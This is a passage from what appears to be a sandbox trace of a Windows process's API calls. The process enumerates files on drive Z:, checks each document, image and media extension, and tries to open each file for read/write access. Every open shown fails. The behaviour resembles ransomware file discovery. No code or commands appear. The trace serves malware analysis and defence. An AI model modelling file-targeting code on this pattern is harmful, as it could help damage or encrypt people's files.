lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.794] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfd50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6R7qq9DkqNA3WVHMTs.doc", cAlternateFileName="")) returned 1 [0176.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.794] PathFindExtensionW (pszPath="Z:\\6R7qq9DkqNA3WVHMTs.doc") returned=".doc" [0176.799] CreateFileW (lpFileName="Z:\\6R7qq9DkqNA3WVHMTs.doc" (normalized: "z:\\6r7qq9dkqna3wvhmts.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.801] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11e85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KAk0a7xY4jTir.m4a", cAlternateFileName="")) returned 1 [0176.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.801] PathFindExtensionW (pszPath="Z:\\KAk0a7xY4jTir.m4a") returned=".m4a" [0176.805] CreateFileW (lpFileName="Z:\\KAk0a7xY4jTir.m4a" (normalized: "z:\\kak0a7xy4jtir.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.806] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x92e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5n4Otxttbgfrkyd1Qv.mp3", cAlternateFileName="")) returned 1 [0176.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.808] PathFindExtensionW (pszPath="Z:\\5n4Otxttbgfrkyd1Qv.mp3") returned=".mp3" [0176.812] CreateFileW (lpFileName="Z:\\5n4Otxttbgfrkyd1Qv.mp3" (normalized: "z:\\5n4otxttbgfrkyd1qv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.813] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1361c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZRruaCKjxo6i.ots", cAlternateFileName="")) returned 1 [0176.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.814] PathFindExtensionW (pszPath="Z:\\ZRruaCKjxo6i.ots") returned=".ots" [0176.818] CreateFileW (lpFileName="Z:\\ZRruaCKjxo6i.ots" (normalized: "z:\\zrruackjxo6i.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.819] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x91ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oNmnCAGLhaZCfP.bmp", cAlternateFileName="")) returned 1 [0176.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.819] PathFindExtensionW (pszPath="Z:\\oNmnCAGLhaZCfP.bmp") returned=".bmp" [0176.823] CreateFileW (lpFileName="Z:\\oNmnCAGLhaZCfP.bmp" (normalized: "z:\\onmncaglhazcfp.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.824] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x155ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B2EjwcG.xls", cAlternateFileName="")) returned 1 [0176.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.824] PathFindExtensionW (pszPath="Z:\\B2EjwcG.xls") returned=".xls" [0176.829] CreateFileW (lpFileName="Z:\\B2EjwcG.xls" (normalized: "z:\\b2ejwcg.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.832] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5b63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tcambCkECjq.ods", cAlternateFileName="")) returned 1 [0176.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.832] PathFindExtensionW (pszPath="Z:\\tcambCkECjq.ods") returned=".ods" [0176.837] CreateFileW (lpFileName="Z:\\tcambCkECjq.ods" (normalized: "z:\\tcambckecjq.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.838] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11a0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1WjGsbbxyz9w44lK.jpg", cAlternateFileName="")) returned 1 [0176.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.838] PathFindExtensionW (pszPath="Z:\\1WjGsbbxyz9w44lK.jpg") returned=".jpg" [0176.843] CreateFileW (lpFileName="Z:\\1WjGsbbxyz9w44lK.jpg" (normalized: "z:\\1wjgsbbxyz9w44lk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.845] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xad00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="85sWKB.jpg", cAlternateFileName="")) returned 1 [0176.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.846] PathFindExtensionW (pszPath="Z:\\85sWKB.jpg") returned=".jpg" [0176.851] CreateFileW (lpFileName="Z:\\85sWKB.jpg" (normalized: "z:\\85swkb.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.854] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15a5f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F01GLe.odt", cAlternateFileName="")) returned 1 [0176.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.854] PathFindExtensionW (pszPath="Z:\\F01GLe.odt") returned=".odt" [0176.860] CreateFileW (lpFileName="Z:\\F01GLe.odt" (normalized: "z:\\f01gle.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.863] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10636, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7wJ29fsIwS36l.ods", cAlternateFileName="")) returned 1 [0176.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.863] PathFindExtensionW (pszPath="Z:\\7wJ29fsIwS36l.ods") returned=".ods" [0176.883] CreateFileW (lpFileName="Z:\\7wJ29fsIwS36l.ods" (normalized: "z:\\7wj29fsiws36l.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.891] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x101cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bv3be5Un8YJj.avi", cAlternateFileName="")) returned 1 [0176.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.891] PathFindExtensionW (pszPath="Z:\\bv3be5Un8YJj.avi") returned=".avi" [0176.908] CreateFileW (lpFileName="Z:\\bv3be5Un8YJj.avi" (normalized: "z:\\bv3be5un8yjj.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.919] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc2ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LLAm0.pps", cAlternateFileName="")) returned 1 [0176.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.920] PathFindExtensionW (pszPath="Z:\\LLAm0.pps") returned=".pps" [0176.946] CreateFileW (lpFileName="Z:\\LLAm0.pps" (normalized: "z:\\llam0.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.954] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc9dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NnhUiKm1fKnUDbh8LQYp.mp4", cAlternateFileName="")) returned 1 [0176.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.954] PathFindExtensionW (pszPath="Z:\\NnhUiKm1fKnUDbh8LQYp.mp4") returned=".mp4" [0176.962] CreateFileW (lpFileName="Z:\\NnhUiKm1fKnUDbh8LQYp.mp4" (normalized: "z:\\nnhuikm1fknudbh8lqyp.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.965] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1769e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EqQ64IKq2Th.pptx", cAlternateFileName="")) returned 1 [0176.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.965] PathFindExtensionW (pszPath="Z:\\EqQ64IKq2Th.pptx") returned=".pptx" [0176.969] CreateFileW (lpFileName="Z:\\EqQ64IKq2Th.pptx" (normalized: "z:\\eqq64ikq2th.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.971] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x111e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WVJ9AocI35l55mCp.jpg", cAlternateFileName="")) returned 1 [0176.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.971] PathFindExtensionW (pszPath="Z:\\WVJ9AocI35l55mCp.jpg") returned=".jpg" [0176.975] CreateFileW (lpFileName="Z:\\WVJ9AocI35l55mCp.jpg" (normalized: "z:\\wvj9aoci35l55mcp.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.977] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf281, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kmB0a6WlogU.gif", cAlternateFileName="")) returned 1 [0176.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.977] PathFindExtensionW (pszPath="Z:\\kmB0a6WlogU.gif") returned=".gif" [0176.981] CreateFileW (lpFileName="Z:\\kmB0a6WlogU.gif" (normalized: "z:\\kmb0a6wlogu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.982] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb48c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G7UtZQV2KEwEgGRw.csv", cAlternateFileName="")) returned 1 [0176.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.983] PathFindExtensionW (pszPath="Z:\\G7UtZQV2KEwEgGRw.csv") returned=".csv" [0176.986] CreateFileW (lpFileName="Z:\\G7UtZQV2KEwEgGRw.csv" (normalized: "z:\\g7utzqv2keweggrw.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.989] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x164b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pLGCqUlBqdCyIjLjqV.doc", cAlternateFileName="")) returned 1 [0176.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.989] PathFindExtensionW (pszPath="Z:\\pLGCqUlBqdCyIjLjqV.doc") returned=".doc" [0176.992] CreateFileW (lpFileName="Z:\\pLGCqUlBqdCyIjLjqV.doc" (normalized: "z:\\plgcqulbqdcyijljqv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.994] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc484, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oq2biITomiSUVed.odt", cAlternateFileName="")) returned 1 [0176.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.994] PathFindExtensionW (pszPath="Z:\\Oq2biITomiSUVed.odt") returned=".odt" [0176.998] CreateFileW (lpFileName="Z:\\Oq2biITomiSUVed.odt" (normalized: "z:\\oq2biitomisuved.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2653c835, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="03oNIO07eJKfFtSq1le.pdf", cAlternateFileName="")) returned 1 [0177.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.000] PathFindExtensionW (pszPath="Z:\\03oNIO07eJKfFtSq1le.pdf") returned=".pdf" [0177.004] CreateFileW (lpFileName="Z:\\03oNIO07eJKfFtSq1le.pdf" (normalized: "z:\\03onio07ejkfftsq1le.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.006] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfa4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s6dEvdGK0.pptx", cAlternateFileName="")) returned 1 [0177.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.006] PathFindExtensionW (pszPath="Z:\\s6dEvdGK0.pptx") returned=".pptx" [0177.009] CreateFileW (lpFileName="Z:\\s6dEvdGK0.pptx" (normalized: "z:\\s6devdgk0.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.011] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, 